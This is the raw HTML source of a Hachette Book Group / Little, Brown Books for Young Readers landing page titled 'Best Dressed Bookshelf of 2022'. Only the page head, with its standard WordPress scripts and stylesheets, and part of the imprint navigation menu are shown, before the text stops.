<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>Best Dressed Bookshelf of 2022 | Little, Brown Books for Young Readers</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.lbyr.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.lbyr.com/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.lbyr.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.lbyr.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.2' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.lbyr.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.lbyr.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.0.2' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<style id='hachette-plugin-campaign-view-variables-inline-css' type='text/css'>
	.campaign-view {
		--campaign-view-font-family: 'Source Sans Pro', helvetica, sans-serif, sans-serif;
		--campaign-view-primary-color: inherit;
		--campaign-view-secondary-color: inherit;
	}
</style>
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.lbyr.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=945a749d6bbde67556d7' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.lbyr.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=9e944d6343f0b2c9a5cd' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-lens-css-css'  href='https://www.lbyr.com/wp-content/themes/hachette-book-group/client/build/css/lens-little-brown-books-for-young-readers.css?ver=9e944d6343f0b2c9a5cd' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.lbyr.com/wp-content/mu-plugins/jetpack-11.2/css/jetpack.css?ver=11.2' type='text/css' media='all' />
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.lbyr.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/neille.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.lbyr.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.lbyr.com/wp-json/wp/v2/landing-page/1261559" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.lbyr.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.lbyr.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0.2" />
<link rel="canonical" href="https://www.hachettebookgroup.com/landing-page/best-dressed-bookshelf-of-2022/" />
<link rel='shortlink' href='https://www.lbyr.com/?p=1261559' />
<link rel="alternate" type="application/json+oembed" href="https://www.lbyr.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lbyr.com%2Flanding-page%2Fbest-dressed-bookshelf-of-2022%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.lbyr.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.lbyr.com%2Flanding-page%2Fbest-dressed-bookshelf-of-2022%2F&#038;format=xml" />
<style>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"hachette","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		<link rel="icon" href="https://www.lbyr.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.lbyr.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.lbyr.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.lbyr.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="landing-page-template-default single single-landing-page postid-1261559 lbyr">
				<div id="page" class="site single-post page imprint">
			<header class="site-header">
	<nav class="site-header__nav swappable" data-swap-location=".imprint-header__menu" data-swap-method="append" data-swap-max="m">
		<a href="https://www.hachettebookgroup.com/">
			<div class="site-header__desktop-logo imprint__global-logo ">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-3119152530  desc-hachette-logo-360508782">
	<title id="title-hachette-logo-3119152530">Hachette Logo</title>
	<desc id="desc-hachette-logo-360508782">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</div>
		</a>
		<div class="menu-imprint-nav-container"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-580370916" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-580370916" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-580370916" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2630979900  desc-arrow-2220553205">
	<title id="titlet-arrow-2630979900">Arrow Icon</title>
	<desc id="desc-arrow-2220553205">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-580370916" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-580370916"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1285526949" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1285526949" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1285526949" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1221254158  desc-arrow-4115426322">
	<title id="titlet-arrow-1221254158">Arrow Icon</title>
	<desc id="desc-arrow-4115426322">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1285526949" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1285526949"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1749015184" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1749015184" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1749015184" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3150263426  desc-arrow-1003764087">
	<title id="titlet-arrow-3150263426">Arrow Icon</title>
	<desc id="desc-arrow-1003764087">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1749015184" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1749015184"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-81380623" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-81380623" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-81380623" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1538673185  desc-arrow-3178114641">
	<title id="titlet-arrow-1538673185">Arrow Icon</title>
	<desc id="desc-arrow-3178114641">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-81380623" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-81380623"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve Books">Twelve Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-1320697864" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1320697864" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1320697864" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4031780240  desc-arrow-654143443">
	<title id="titlet-arrow-4031780240">Arrow Icon</title>
	<desc id="desc-arrow-654143443">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1320697864" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1320697864"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-481739952" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-481739952" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-481739952" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2135811539  desc-arrow-324103514">
	<title id="titlet-arrow-2135811539">Arrow Icon</title>
	<desc id="desc-arrow-324103514">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-481739952" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-481739952"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1770174776" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1770174776" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1770174776" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3425075655  desc-arrow-2574577635">
	<title id="titlet-arrow-3425075655">Arrow Icon</title>
	<desc id="desc-arrow-2574577635">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1770174776" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1770174776"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-820296185" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-820296185" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-820296185" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2462904582  desc-arrow-3477650949">
	<title id="titlet-arrow-2462904582">Arrow Icon</title>
	<desc id="desc-arrow-3477650949">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-820296185" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-820296185"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.lbyr.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Publishing">Workman Publishing</a><span id="expand-site-header__sub-menu-985788030" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-985788030" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-985788030" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1636477380  desc-arrow-1514190097">
	<title id="titlet-arrow-1636477380">Arrow Icon</title>
	<desc id="desc-arrow-1514190097">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-985788030" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-985788030"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman">Workman</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.pageaday.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Calendars">Workman Calendars</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/kids" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Kids">Workman Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Books of Chapel Hill">Algonquin Books of Chapel Hill</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin-young-readers" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Young Readers">Algonquin Young Readers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/artisan" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Artisan">Artisan</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.timberpress.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Timber Press">Timber Press</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.storey.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Storey Publishing">Storey Publishing</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-703625127" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-703625127" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-703625127" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4049816088  desc-arrow-1514753457">
	<title id="titlet-arrow-4049816088">Arrow Icon</title>
	<desc id="desc-arrow-1514753457">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
